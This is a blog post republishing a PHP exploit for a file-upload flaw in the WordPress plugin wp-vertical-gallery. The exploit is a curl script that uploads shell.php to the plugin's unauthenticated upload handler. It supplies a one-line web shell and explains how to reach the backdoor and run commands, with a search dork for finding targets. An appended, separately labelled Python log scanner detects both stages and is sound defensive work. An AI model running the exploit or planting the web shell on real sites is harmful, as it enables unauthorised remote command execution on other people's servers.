WordPress plugin wp-vertical-gallery file Upload Vulnerability - 04 Day



Thursday, November 30, 2017

WordPress plugin wp-vertical-gallery file Upload Vulnerability

<?php
#
# [>] Title : WordPress plugin wp-vertical-gallery file Upload Vulnerability
#
# [>] Author : sohaip-hackersohaip
# [+] bloog : http://www.tools-hack.com
# [+] FaCeb0ok : fb.me/sohaipbarika
# [+] TwiTter : @dorksql
# [+] dork : /wp-content/plugins/wp-vertical-gallery/
# [#] Platform : PHP / WebApp
# [+] Cat/Tag : File Upload / Code Exec
# [!] Vendor : http://www.i13websolution.com
#
###########################################
#
# [!] Description :
#
# The WordPress plugin wp-vertical-gallery suffers from a file/shell upload vulnerability:
# a remote attacker can upload a file/shell/backdoor and execute commands.
#
#################################################################
#
# ExpLO!T : 
# -------
$postData = array();
$postData[ 'file' ] = "@shell.php"; 
$sohaip = curl_init();
curl_setopt($sohaip, CURLOPT_URL, "http://[Target]/wp-content/plugins/wp-vertical-gallery/js/swfupload/js/upload.php");
curl_setopt($sohaip, CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0)");
curl_setopt($sohaip, CURLOPT_POST, 1);
curl_setopt($sohaip, CURLOPT_POSTFIELDS, $postData );
curl_setopt($sohaip, CURLOPT_TIMEOUT, 0);
$dzhack = curl_exec ($sohaip);
curl_close($sohaip);
unset($sohaip);
echo $dzhack;
/*
[!] create your shell file =>
 _ shell.php :
 <?php system($_GET['sohaip']); ?>
  
[>] Post the exploit 
[+] Find your backdoor : ../wp-content/uploads/2017/05/sohaip.php?sohaip=[ CMD ]
[+] Or upload what you want ^_^ ...
*/
#################################################################################
# ABOUT
# Facebook : https://www.facebook.com/Fallagahacker.Tn/
# forum : http://spyhackerz.com/forum/
# Blog : http://www.03day.ga/
#################################################################################
?>
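As an added defensive example (not part of the original advisory), the following Python scans web-server access logs for the two stages this exploit leaves behind: a POST to the plugin's swfupload upload.php handler, and a later request for a PHP script served out of wp-content/uploads/. The log lines are constructed samples in Apache combined format; the endpoint and upload paths are taken from the advisory above.

```python
import re

# Constructed sample access-log lines (Apache combined format). They replay the
# two stages described in the advisory: an unauthenticated POST to the plugin's
# swfupload handler, then a request for a PHP file under wp-content/uploads.
SAMPLE_LOG = """\
203.0.113.5 - - [30/Nov/2017:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [30/Nov/2017:10:01:09 +0000] "POST /wp-content/plugins/wp-vertical-gallery/js/swfupload/js/upload.php HTTP/1.1" 200 41 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0)"
203.0.113.5 - - [30/Nov/2017:10:01:15 +0000] "GET /wp-content/uploads/2017/05/sohaip.php?sohaip=id HTTP/1.1" 200 88 "-" "Mozilla/5.0"
198.51.100.7 - - [30/Nov/2017:10:02:00 +0000] "GET /wp-content/uploads/2017/05/photo.jpg HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

UPLOAD_HANDLER = "/wp-content/plugins/wp-vertical-gallery/js/swfupload/js/upload.php"
# Any PHP script requested from the uploads tree is a strong webshell indicator,
# since WordPress itself never serves PHP from there.
UPLOADS_PHP_RE = re.compile(r"^/wp-content/uploads/.*\.php(\?|$)", re.IGNORECASE)

def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def detect(log_text):
    """Return one alert per request matching either stage of the pattern."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"]
        if rec["method"] == "POST" and path.split("?")[0] == UPLOAD_HANDLER:
            alerts.append({"stage": "upload", "ip": rec["ip"], "ts": rec["ts"], "path": path})
        elif UPLOADS_PHP_RE.match(path):
            alerts.append({"stage": "execute", "ip": rec["ip"], "ts": rec["ts"], "path": path})
    return alerts

def correlate(alerts):
    """Group stages by source IP; an IP seen in both stages is high confidence."""
    by_ip = {}
    for a in alerts:
        by_ip.setdefault(a["ip"], set()).add(a["stage"])
    return {ip: sorted(stages) for ip, stages in by_ip.items()}

if __name__ == "__main__":
    found = detect(SAMPLE_LOG)
    for a in found:
        print(a)
    print(correlate(found))
```

The same two checks translate directly into a WAF or SIEM rule: block or alert on unauthenticated POSTs to the handler path, and alert on any .php request under the uploads directory.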
